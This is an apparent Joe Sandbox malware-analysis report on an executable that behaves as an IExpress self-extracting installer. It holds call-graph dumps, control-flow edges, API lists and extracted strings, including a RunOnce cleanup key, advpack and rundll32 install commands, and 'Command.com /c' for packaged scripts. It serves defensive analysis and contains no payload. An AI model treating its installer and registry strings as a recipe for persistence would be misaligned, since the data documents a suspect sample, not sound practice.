3088->2995 3088->2997 3090 7ff6fd21159f 3089->3090 3090->3088 3091 7ff6fd217f48 2 API calls 3090->3091 3091->3090 3093 7ff6fd212b1f 3092->3093 3096 7ff6fd212d41 3092->3096 3094 7ff6fd212b28 GetModuleFileNameA 3093->3094 3093->3096 3094->3096 3105 7ff6fd212b50 3094->3105 3095 7ff6fd2186f0 7 API calls 3097 7ff6fd212d54 3095->3097 3096->3095 3097->3014 3098 7ff6fd212b54 IsDBCSLeadByte 3098->3105 3099 7ff6fd212b79 CharNextA CharUpperA 3102 7ff6fd212c6d CharUpperA 3099->3102 3099->3105 3100 7ff6fd212d13 CharNextA 3101 7ff6fd212d25 CharNextA 3100->3101 3101->3096 3101->3098 3102->3105 3104 7ff6fd212bbe CharPrevA 3104->3105 3105->3098 3105->3099 3105->3100 3105->3101 3105->3104 3111 7ff6fd217ea0 3105->3111 3110 7ff6fd217f60 3106->3110 3107 7ff6fd217f6a IsDBCSLeadByte 3109 7ff6fd217f99 3107->3109 3107->3110 3108 7ff6fd217f82 CharNextA 3108->3110 3109->3085 3110->3107 3110->3108 3110->3109 3112 7ff6fd217eb8 3111->3112 3112->3112 3113 7ff6fd217ec1 CharPrevA 3112->3113 3114 7ff6fd217edd CharPrevA 3113->3114 3115 7ff6fd217ef4 3114->3115 3116 7ff6fd217ed5 3114->3116 3117 7ff6fd217f27 3115->3117 3118 7ff6fd217efe CharPrevA 3115->3118 3119 7ff6fd217f15 CharNextA 3115->3119 3116->3114 3116->3118 3117->3105 3118->3117 3118->3119 3119->3117 3120->3063 3121->2871 3123 7ff6fd212349 RegQueryInfoKeyA RegCloseKey 3122->3123 3124 7ff6fd2123ad 3122->3124 3123->3124 3124->2527 3126 7ff6fd2122db 3125->3126 3127 7ff6fd212271 3125->3127 3129 7ff6fd2186f0 7 API calls 3126->3129 3128 7ff6fd217e08 CharPrevA 3127->3128 3130 7ff6fd212284 WritePrivateProfileStringA _lopen 3128->3130 3131 7ff6fd2122ed 3129->3131 3130->3126 3132 7ff6fd2122b7 _llseek _lclose 3130->3132 3131->2527 3132->3126 3245 7ff6fd21874b RtlCaptureContext RtlLookupFunctionEntry 3246 7ff6fd2187d7 3245->3246 3247 7ff6fd218795 RtlVirtualUnwind 3245->3247 3250 7ff6fd218714 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 3246->3250 3247->3246 3251 7ff6fd215aca 3252 7ff6fd215a9e 3251->3252 3253 7ff6fd215ad0 GlobalFree 3251->3253 3254 7ff6fd213a4e 3255 7ff6fd213a73 3254->3255 3256 7ff6fd213b49 3254->3256 3255->3256 3257 7ff6fd213a88 3255->3257 3258 7ff6fd213b51 GetDesktopWindow 3255->3258 3259 7ff6fd213a94 3256->3259 3260 7ff6fd213c5a EndDialog 3256->3260 3261 7ff6fd213abb 3257->3261 3262 7ff6fd213a8c 3257->3262 3263 7ff6fd214dc8 14 API calls 3258->3263 3260->3259 3261->3259 3266 7ff6fd213ac5 ResetEvent 3261->3266 3262->3259 3265 7ff6fd213a9b TerminateThread 3262->3265 3264 7ff6fd213b6f 3263->3264 3267 7ff6fd213b78 GetDlgItem SendMessageA GetDlgItem SendMessageA 3264->3267 3268 7ff6fd213bdb SetWindowTextA CreateThread 3264->3268 3265->3260 3269 7ff6fd214f2c 24 API calls 3266->3269 3267->3268 3268->3259 3270 7ff6fd213c28 3268->3270 3271 7ff6fd213b03 3269->3271 3272 7ff6fd214f2c 24 API calls 3270->3272 3273 7ff6fd213b24 SetEvent 3271->3273 3274 7ff6fd213b0c SetEvent 3271->3274 3272->3256 3275 7ff6fd213c80 4 API calls 3273->3275 3274->3259 3275->3256 3276 7ff6fd2134ce 3277 7ff6fd2134eb CallWindowProcA 3276->3277 3278 7ff6fd2134dc 3276->3278 3279 7ff6fd2134e7 3277->3279 3278->3277 3278->3279 3280 7ff6fd21868e 3281 7ff6fd2186a6 3280->3281 3282 7ff6fd21869d _exit 3280->3282 3283 7ff6fd2186bb 3281->3283 3284 7ff6fd2186af _cexit 3281->3284 3282->3281 3284->3283 3285 7ff6fd2189ce 3286 7ff6fd2189df 3285->3286 3287 7ff6fd218a02 3285->3287 3286->3287 3288 7ff6fd2189fb ?terminate@ 3286->3288 3288->3287 3289 7ff6fd217b0f 3290 7ff6fd217b5d 3289->3290 3291 7ff6fd217e08 CharPrevA 3290->3291 3292 7ff6fd217b95 CreateFileA 3291->3292 3293 7ff6fd217bde WriteFile 3292->3293 3294 7ff6fd217bd0 3292->3294 3295 7ff6fd217c02 CloseHandle 3293->3295 3297 7ff6fd2186f0 7 API calls 3294->3297 3295->3294 3298 7ff6fd217c35 3297->3298 2235 7ff6fd2158d0 2242 7ff6fd213c80 2235->2242 2238 7ff6fd2158fa 2239 7ff6fd215902 WriteFile 2239->2238 2240 7ff6fd215939 2239->2240 2240->2238 2241 7ff6fd215965 SendDlgItemMessageA 2240->2241 2241->2238 2243 7ff6fd213c8c MsgWaitForMultipleObjects 2242->2243 2244 7ff6fd213cb4 PeekMessageA 2243->2244 2245 7ff6fd213d25 2243->2245 2244->2243 2246 7ff6fd213cd9 2244->2246 2245->2238 2245->2239 2246->2243 2246->2245 2247 7ff6fd213ce7 DispatchMessageA 2246->2247 2248 7ff6fd213cf8 PeekMessageA 2246->2248 2247->2248 2248->2246 3299 7ff6fd2155ba 3300 7ff6fd21557c 3299->3300 3301 7ff6fd2155be 3299->3301 3302 7ff6fd21563d lstrcmpA 3301->3302 3303 7ff6fd215610 3301->3303 3305 7ff6fd215634 3302->3305 3306 7ff6fd215694 3302->3306 3304 7ff6fd214f2c 24 API calls 3303->3304 3304->3305 3306->3305 3307 7ff6fd2156e8 CreateFileA 3306->3307 3307->3305 3309 7ff6fd21571e 3307->3309 3308 7ff6fd2157a1 CreateFileA 3308->3305 3309->3305 3309->3308 3310 7ff6fd215789 CharNextA 3309->3310 3311 7ff6fd215772 CreateDirectoryA 3309->3311 3310->3309 3311->3310 3312 7ff6fd214b3b SendMessageA 3313 7ff6fd21397e 3314 7ff6fd21399a 3313->3314 3315 7ff6fd213992 3313->3315 3316 7ff6fd213a2c EndDialog 3314->3316 3319 7ff6fd21399f 3314->3319 3315->3314 3317 7ff6fd2139ce GetDesktopWindow 3315->3317 3316->3319 3318 7ff6fd214dc8 14 API calls 3317->3318 3320 7ff6fd2139e5 SetWindowTextA SetDlgItemTextA SetForegroundWindow 3318->3320 3320->3319 3321 7ff6fd215f7e 3322 7ff6fd2151f8 7 API calls 3321->3322 3323 7ff6fd215f9b FindResourceA LoadResource LockResource 3322->3323 3324 7ff6fd215fec 3323->3324 3325 7ff6fd2161bf 3323->3325 3326 7ff6fd216046 3324->3326 3327 7ff6fd215ff8 GetDlgItem ShowWindow GetDlgItem ShowWindow 3324->3327 3328 7ff6fd215e44 33 API calls 3326->3328 3327->3326 3329 7ff6fd21604b 3328->3329 3330 7ff6fd216059 #20 3329->3330 3331 7ff6fd21604f 3329->3331 3330->3331 3332 7ff6fd2160c1 #22 3330->3332 3335 7ff6fd214f2c 24 API calls 3331->3335 3333 7ff6fd216143 3332->3333 3334 7ff6fd216105 #23 3332->3334 3336 7ff6fd216151 FreeResource 3333->3336 3337 7ff6fd216165 3333->3337 3334->3331 3334->3333 3335->3333 3336->3337 3338 7ff6fd21618f 3337->3338 3339 7ff6fd214f2c 24 API calls 3337->3339 3338->3325 3340 7ff6fd2161a1 SendMessageA 3338->3340 3339->3338 3340->3325 3341 7ff6fd218400 __getmainargs

                                                                                                                Callgraph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                • Opacity -> Relevance
                                                                                                                • Disassembly available
                                                                                                                callgraph 0 Function_00007FF6FD21366E 3 Function_00007FF6FD214B70 0->3 32 Function_00007FF6FD216D9C 0->32 58 Function_00007FF6FD214DC8 0->58 76 Function_00007FF6FD214F2C 0->76 89 Function_00007FF6FD217E08 0->89 96 Function_00007FF6FD216F14 0->96 1 Function_00007FF6FD21146E 51 Function_00007FF6FD2186F0 1->51 1->58 2 Function_00007FF6FD212D70 54 Function_00007FF6FD211BF4 2->54 56 Function_00007FF6FD212EDC 2->56 57 Function_00007FF6FD2163DC 2->57 71 Function_00007FF6FD2123C0 2->71 2->76 97 Function_00007FF6FD213214 2->97 3->76 4 Function_00007FF6FD211558 11 Function_00007FF6FD217F48 4->11 5 Function_00007FF6FD217958 6 Function_00007FF6FD211258 6->51 77 Function_00007FF6FD211130 6->77 7 Function_00007FF6FD21845E 7->2 9 Function_00007FF6FD218B60 7->9 8 Function_00007FF6FD218460 8->2 8->9 55 Function_00007FF6FD218BF4 8->55 74 Function_00007FF6FD218BC0 9->74 95 Function_00007FF6FD218B10 9->95 10 Function_00007FF6FD214064 10->5 75 Function_00007FF6FD217D28 10->75 10->76 99 Function_00007FF6FD2151F8 10->99 12 Function_00007FF6FD218049 13 Function_00007FF6FD21874B 98 Function_00007FF6FD218714 13->98 14 Function_00007FF6FD218A4C 15 Function_00007FF6FD213A4E 44 Function_00007FF6FD213C80 15->44 15->58 15->76 16 Function_00007FF6FD217C50 16->51 16->89 17 Function_00007FF6FD214A54 17->76 17->99 18 Function_00007FF6FD218154 18->51 19 Function_00007FF6FD214838 19->5 19->51 19->71 19->76 20 Function_00007FF6FD214B3B 21 Function_00007FF6FD218D3C 22 Function_00007FF6FD212644 22->51 22->89 23 Function_00007FF6FD215E44 29 Function_00007FF6FD2159B0 23->29 23->51 72 Function_00007FF6FD2155C0 23->72 24 Function_00007FF6FD2165A8 24->51 70 Function_00007FF6FD2110BC 24->70 24->89 25 Function_00007FF6FD2159A9 26 Function_00007FF6FD218AA8 26->14 27 Function_00007FF6FD215AAE 28 Function_00007FF6FD217AAF 30 Function_00007FF6FD2141B4 30->5 30->16 30->19 30->51 53 Function_00007FF6FD2115F4 30->53 30->70 30->76 30->89 94 Function_00007FF6FD211D10 30->94 30->99 31 Function_00007FF6FD212898 31->22 32->5 32->76 32->89 33 Function_00007FF6FD21729C 34 Function_00007FF6FD217EA0 35 Function_00007FF6FD218BA0 36 Function_00007FF6FD21868E 37 Function_00007FF6FD212490 37->51 37->76 38 Function_00007FF6FD218A92 39 Function_00007FF6FD216294 39->5 39->76 39->99 40 Function_00007FF6FD215478 40->76 41 Function_00007FF6FD21397E 41->58 42 Function_00007FF6FD215F7E 42->23 42->76 42->99 43 Function_00007FF6FD215F80 43->23 43->76 43->99 45 Function_00007FF6FD218084 46 Function_00007FF6FD217984 46->51 46->70 47 Function_00007FF6FD212AE8 47->34 47->51 48 Function_00007FF6FD215AEA 49 Function_00007FF6FD2168F0 49->5 49->37 49->51 49->75 49->76 49->89 93 Function_00007FF6FD216710 49->93 49->96 49->99 50 Function_00007FF6FD215AF1 50->29 50->40 50->51 66 Function_00007FF6FD2152D4 50->66 67 Function_00007FF6FD2153B8 50->67 50->72 100 Function_00007FF6FD215CFC 50->100 51->98 52 Function_00007FF6FD218DF0 53->4 53->47 53->51 68 Function_00007FF6FD217FB8 53->68 53->70 53->76 53->89 90 Function_00007FF6FD211008 53->90 54->51 54->76 56->6 56->51 56->75 56->76 78 Function_00007FF6FD212034 56->78 80 Function_00007FF6FD213D34 56->80 86 Function_00007FF6FD217320 56->86 56->99 57->34 57->51 57->78 58->51 59 Function_00007FF6FD2188C8 59->98 60 Function_00007FF6FD215ACA 61 Function_00007FF6FD218CCA 62 Function_00007FF6FD2134CE 63 Function_00007FF6FD2189CE 64 Function_00007FF6FD2158D0 64->44 65 Function_00007FF6FD2161D4 65->46 65->76 65->99 66->90 67->75 69 Function_00007FF6FD2155BA 69->76 79 Function_00007FF6FD212234 71->79 91 Function_00007FF6FD212308 71->91 72->76 73 Function_00007FF6FD211BC0 73->76 75->76 76->18 76->45 76->51 76->70 77->51 78->51 78->78 78->89 78->90 79->51 79->89 80->18 80->31 80->45 80->51 80->76 81 Function_00007FF6FD21351E 81->58 82 Function_00007FF6FD215A1E 83 Function_00007FF6FD21831E 83->26 101 Function_00007FF6FD218B00 83->101 84 Function_00007FF6FD218A1E 85 Function_00007FF6FD212520 85->51 85->70 85->76 86->11 86->33 86->51 86->59 86->68 86->73 86->89 87 Function_00007FF6FD215820 88 Function_00007FF6FD218E20 89->90 92 Function_00007FF6FD217B0F 92->51 92->89 93->5 93->24 93->32 93->51 93->89 93->96 94->51 94->70 94->76 94->89 96->5 96->51 96->76 96->85 97->5 97->10 97->17 97->30 97->39 97->43 97->46 97->49 97->51 97->65 97->71 97->75 97->76 97->89 97->96 102 Function_00007FF6FD218400 103 Function_00007FF6FD218D02 103->21

                                                                                                                Executed Functions

                                                                                                                Function 00007FF6FD2141B4 Relevance: 54.6, APIs: 17, Strings: 14, Instructions: 372libraryloaderCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 0 7ff6fd2141b4-7ff6fd214206 1 7ff6fd214208-7ff6fd214223 call 7ff6fd2151f8 0->1 2 7ff6fd214229-7ff6fd214231 0->2 1->2 10 7ff6fd21434a-7ff6fd214373 call 7ff6fd214f2c 1->10 4 7ff6fd214235-7ff6fd214257 memset 2->4 5 7ff6fd214378-7ff6fd21438b 4->5 6 7ff6fd21425d-7ff6fd214278 call 7ff6fd2151f8 4->6 9 7ff6fd21438f-7ff6fd214399 5->9 6->10 16 7ff6fd21427e-7ff6fd214284 6->16 13 7ff6fd21439b-7ff6fd2143a1 9->13 14 7ff6fd2143ad-7ff6fd2143b8 9->14 23 7ff6fd2145e9 10->23 13->14 18 7ff6fd2143a3-7ff6fd2143ab 13->18 15 7ff6fd2143bb-7ff6fd2143be 14->15 19 7ff6fd21441e-7ff6fd214433 call 7ff6fd2115f4 15->19 20 7ff6fd2143c0-7ff6fd2143d8 call 7ff6fd2151f8 15->20 21 7ff6fd214286-7ff6fd21428b 16->21 22 7ff6fd21428d-7ff6fd214290 16->22 18->9 18->14 19->23 37 7ff6fd214439-7ff6fd214440 19->37 20->10 36 7ff6fd2143de-7ff6fd2143e5 20->36 25 7ff6fd2142a5 21->25 26 7ff6fd21429d-7ff6fd21429f 22->26 27 7ff6fd214292-7ff6fd21429b 22->27 29 7ff6fd2145eb-7ff6fd21461a call 7ff6fd2186f0 23->29 31 7ff6fd2142a8-7ff6fd2142ab 25->31 26->31 32 7ff6fd2142a1 26->32 27->25 31->15 38 7ff6fd2142b1-7ff6fd2142bb 31->38 32->25 39 7ff6fd2143eb-7ff6fd214418 CompareStringA 36->39 40 7ff6fd2146d3-7ff6fd2146da 36->40 41 7ff6fd214460-7ff6fd214462 37->41 42 7ff6fd214442-7ff6fd214449 37->42 43 7ff6fd214327-7ff6fd21432a 38->43 44 7ff6fd2142bd-7ff6fd2142c0 38->44 39->19 39->40 51 7ff6fd214828-7ff6fd21482a 40->51 52 7ff6fd2146e0-7ff6fd2146e7 40->52 45 7ff6fd214468-7ff6fd21446f 41->45 46 7ff6fd214593-7ff6fd21459f call 7ff6fd214838 41->46 42->41 48 7ff6fd21444b-7ff6fd214452 42->48 43->19 47 7ff6fd214330-7ff6fd214348 call 7ff6fd2151f8 43->47 49 7ff6fd2142cb-7ff6fd2142cd 44->49 50 7ff6fd2142c2-7ff6fd2142c9 44->50 53 7ff6fd214694-7ff6fd2146ce call 7ff6fd214f2c LocalFree 45->53 54 7ff6fd214475-7ff6fd214477 45->54 64 7ff6fd2145a4-7ff6fd2145a6 46->64 47->10 47->15 48->41 57 7ff6fd214454-7ff6fd214456 48->57 49->23 59 7ff6fd2142d3 49->59 58 7ff6fd2142da-7ff6fd2142eb call 7ff6fd2151f8 50->58 51->29 52->51 60 7ff6fd2146ed-7ff6fd21471c RegOpenKeyExA 52->60 53->23 54->46 63 7ff6fd21447d-7ff6fd214484 54->63 57->45 67 7ff6fd214458-7ff6fd21445b call 7ff6fd211d10 57->67 58->10 78 7ff6fd2142ed-7ff6fd21431d CompareStringA 58->78 59->58 60->51 61 7ff6fd214722-7ff6fd214761 RegQueryValueExA 60->61 68 7ff6fd214817-7ff6fd214823 RegCloseKey 61->68 69 7ff6fd214767-7ff6fd214796 memset GetSystemDirectoryA 61->69 63->46 71 7ff6fd21448a-7ff6fd214495 call 7ff6fd217c50 63->71 72 7ff6fd2145a8-7ff6fd2145be LocalFree 64->72 73 7ff6fd2145da-7ff6fd2145e4 LocalFree 64->73 67->41 68->51 76 7ff6fd214798-7ff6fd2147a9 call 7ff6fd217e08 69->76 77 7ff6fd2147ae-7ff6fd2147d7 call 7ff6fd2110bc 69->77 86 7ff6fd21449b-7ff6fd2144b7 GetProcAddress 71->86 87 7ff6fd21466f-7ff6fd214692 call 7ff6fd214f2c 71->87 72->40 80 7ff6fd2145c4-7ff6fd2145c9 72->80 73->23 76->77 88 7ff6fd2147de-7ff6fd2147e5 77->88 78->43 82 7ff6fd21431f-7ff6fd214322 78->82 80->4 82->19 89 7ff6fd21461c-7ff6fd214649 call 7ff6fd214f2c FreeLibrary 86->89 90 7ff6fd2144bd-7ff6fd21450b 86->90 98 7ff6fd21464e-7ff6fd21466a LocalFree call 7ff6fd217958 87->98 88->88 93 7ff6fd2147e7-7ff6fd214812 RegSetValueExA 88->93 89->98 94 7ff6fd21450d-7ff6fd214511 90->94 95 7ff6fd214515-7ff6fd21451d 90->95 93->68 94->95 99 7ff6fd214527-7ff6fd214529 95->99 100 7ff6fd21451f-7ff6fd214523 95->100 98->23 102 7ff6fd21452b-7ff6fd21452f 99->102 103 7ff6fd214533-7ff6fd21453b 99->103 100->99 102->103 105 7ff6fd21453d-7ff6fd214541 103->105 106 7ff6fd214545-7ff6fd214547 103->106 105->106 107 7ff6fd214549-7ff6fd21454d 106->107 108 7ff6fd214551-7ff6fd21457e 106->108 107->108 110 7ff6fd2145ce-7ff6fd2145d5 FreeLibrary 108->110 111 7ff6fd214580-7ff6fd214591 FreeLibrary 108->111 110->73 111->72
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Resource$Free$CompareFindLibraryLocalString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                                                                • String ID: 124$<None>$ADMQCMD$C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$Software\Microsoft\Windows\CurrentVersion\RunOnce$USRQCMD$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup0
                                                                                                                • API String ID: 2679723528-2787484224
                                                                                                                • Opcode ID: effdab913d68b8f5cb6356f1f4624d08c697481126c570b33e8394dce573185e
                                                                                                                • Instruction ID: b5c7e3400dee5e06f1c13ab6e52c1bb56151e6abc0a8c524d994a4f49ef11cf5
                                                                                                                • Opcode Fuzzy Hash: effdab913d68b8f5cb6356f1f4624d08c697481126c570b33e8394dce573185e
                                                                                                                • Instruction Fuzzy Hash: B1025F75A0868296E7209B14EA406B977A0FB88748F548135DB6DC36D4FF3EF546C7C0
                                                                                                                Function 00007FF6FD211D10 Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 182registrylibrarymemoryCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery
                                                                                                                • String ID: %s /D:%s$C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup0
                                                                                                                • API String ID: 1522771004-2414900631
                                                                                                                • Opcode ID: 2b53b3767e793faff65087a239a43c24df66161b19351fe183ebef1a3c7f0936
                                                                                                                • Instruction ID: 2f2507680007d9ccc1481167e5276ce3f86079b58562bc1573bc0a56eb08ee84
                                                                                                                • Opcode Fuzzy Hash: 2b53b3767e793faff65087a239a43c24df66161b19351fe183ebef1a3c7f0936
                                                                                                                • Instruction Fuzzy Hash: 0F814E36A18B8296E7118F21E9502B9B7A0FB89B54F449131DA6EC3794FF3EE505C7C0
                                                                                                                Function 00007FF6FD2115F4 Relevance: 37.1, APIs: 10, Strings: 11, Instructions: 375memoryCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 144 7ff6fd2115f4-7ff6fd211646 145 7ff6fd211649-7ff6fd211653 144->145 146 7ff6fd211668-7ff6fd21167a 145->146 147 7ff6fd211655-7ff6fd21165b 145->147 149 7ff6fd211689-7ff6fd211690 146->149 150 7ff6fd21167c-7ff6fd211687 146->150 147->146 148 7ff6fd21165d-7ff6fd211666 147->148 148->145 148->146 151 7ff6fd211694-7ff6fd2116b2 call 7ff6fd211558 149->151 150->151 154 7ff6fd21171e-7ff6fd211730 151->154 155 7ff6fd2116b4 151->155 156 7ff6fd211735-7ff6fd21173f 154->156 157 7ff6fd2116b7-7ff6fd2116be 155->157 158 7ff6fd211741-7ff6fd211747 156->158 159 7ff6fd211754-7ff6fd21176d call 7ff6fd217e08 156->159 157->157 160 7ff6fd2116c0-7ff6fd2116c4 157->160 158->159 161 7ff6fd211749-7ff6fd211752 158->161 164 7ff6fd211772-7ff6fd211782 call 7ff6fd217fb8 159->164 160->154 163 7ff6fd2116c6-7ff6fd2116cd 160->163 161->156 161->159 165 7ff6fd2116cf-7ff6fd2116d2 163->165 166 7ff6fd2116d4-7ff6fd2116d6 163->166 174 7ff6fd211788-7ff6fd2117b5 CompareStringA 164->174 175 7ff6fd2119d3-7ff6fd2119e3 call 7ff6fd217fb8 164->175 165->166 169 7ff6fd2116dc-7ff6fd2116ec 165->169 166->154 167 7ff6fd2116d8-7ff6fd2116da 166->167 167->154 167->169 170 7ff6fd2116ef-7ff6fd2116f9 169->170 172 7ff6fd2116fb-7ff6fd211701 170->172 173 7ff6fd21170e-7ff6fd21171c 170->173 172->173 177 7ff6fd211703-7ff6fd21170c 172->177 173->164 174->175 176 7ff6fd2117bb-7ff6fd2117cf GetFileAttributesA 174->176 184 7ff6fd2119e9-7ff6fd211a16 CompareStringA 175->184 185 7ff6fd211a83-7ff6fd211aa1 LocalAlloc 175->185 179 7ff6fd2119ab-7ff6fd2119b3 176->179 180 7ff6fd2117d5-7ff6fd2117dd 176->180 177->170 177->173 183 7ff6fd2119b8-7ff6fd2119ce call 7ff6fd214f2c 179->183 180->179 182 7ff6fd2117e3-7ff6fd2117ff call 7ff6fd211558 180->182 197 7ff6fd211801-7ff6fd21181e call 7ff6fd211558 182->197 198 7ff6fd211823-7ff6fd211841 LocalAlloc 182->198 200 7ff6fd211b8f-7ff6fd211bb8 call 7ff6fd2186f0 183->200 184->185 186 7ff6fd211a18-7ff6fd211a1f 184->186 189 7ff6fd211a5a-7ff6fd211a65 185->189 190 7ff6fd211aa3-7ff6fd211ab7 GetFileAttributesA 185->190 191 7ff6fd211a22-7ff6fd211a29 186->191 189->183 194 7ff6fd211b36-7ff6fd211b40 190->194 195 7ff6fd211ab9-7ff6fd211abb 190->195 191->191 196 7ff6fd211a2b 191->196 199 7ff6fd211b47-7ff6fd211b51 194->199 195->194 201 7ff6fd211abd-7ff6fd211ace 195->201 203 7ff6fd211a30-7ff6fd211a37 196->203 197->198 198->189 205 7ff6fd211847-7ff6fd2118c3 GetPrivateProfileIntA GetPrivateProfileStringA 198->205 206 7ff6fd211b53-7ff6fd211b58 199->206 207 7ff6fd211b65-7ff6fd211b70 199->207 208 7ff6fd211ad5-7ff6fd211adf 201->208 203->203 210 7ff6fd211a39-7ff6fd211a58 LocalAlloc 203->210 211 7ff6fd211940-7ff6fd21194f 205->211 212 7ff6fd2118c5-7ff6fd2118d4 205->212 206->207 213 7ff6fd211b5a-7ff6fd211b63 206->213 214 7ff6fd211b73-7ff6fd211b7d call 7ff6fd212ae8 207->214 215 7ff6fd211ae1-7ff6fd211ae7 208->215 216 7ff6fd211af4-7ff6fd211b05 208->216 210->189 220 7ff6fd211a6a-7ff6fd211a7e call 7ff6fd2110bc 210->220 218 7ff6fd211951-7ff6fd211971 GetShortPathNameA 211->218 219 7ff6fd211973 211->219 221 7ff6fd2118d7-7ff6fd2118e1 212->221 213->199 213->207 229 7ff6fd211b82-7ff6fd211b8c 214->229 215->216 223 7ff6fd211ae9-7ff6fd211af2 215->223 216->214 217 7ff6fd211b07-7ff6fd211b0a 216->217 217->214 224 7ff6fd211b0c-7ff6fd211b34 call 7ff6fd211008 * 2 217->224 225 7ff6fd21197a-7ff6fd2119a6 call 7ff6fd2110bc 218->225 219->225 220->229 227 7ff6fd2118f6-7ff6fd21190c 221->227 228 7ff6fd2118e3-7ff6fd2118e9 221->228 223->208 223->216 224->214 225->229 234 7ff6fd21190f-7ff6fd211919 227->234 228->227 233 7ff6fd2118eb-7ff6fd2118f4 228->233 229->200 233->221 233->227 237 7ff6fd21191b-7ff6fd211920 234->237 238 7ff6fd21192d-7ff6fd21193b 234->238 237->238 239 7ff6fd211922-7ff6fd21192b 237->239 238->229 239->234 239->238
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                                                                • String ID: .BAT$.INF$AdvancedINF$C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                                                                • API String ID: 383838535-981289760
                                                                                                                • Opcode ID: 04e882688a3d6962a8916aaff69b712f8d647ab79ac1c3b0525099cd5c9803bb
                                                                                                                • Instruction ID: ec1c081ab1b63e24e6ed517fd5dac6a9cdf440d53cebfa3a7658401d2583b544
                                                                                                                • Opcode Fuzzy Hash: 04e882688a3d6962a8916aaff69b712f8d647ab79ac1c3b0525099cd5c9803bb
                                                                                                                • Instruction Fuzzy Hash: 2FF18D62A0878295EB128F24A6402B97BA1EB45794F948235DB6DC37D5FF3EF509C3C0
                                                                                                                Function 00007FF6FD2168F0 Relevance: 35.3, APIs: 14, Strings: 6, Instructions: 299memorystringCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
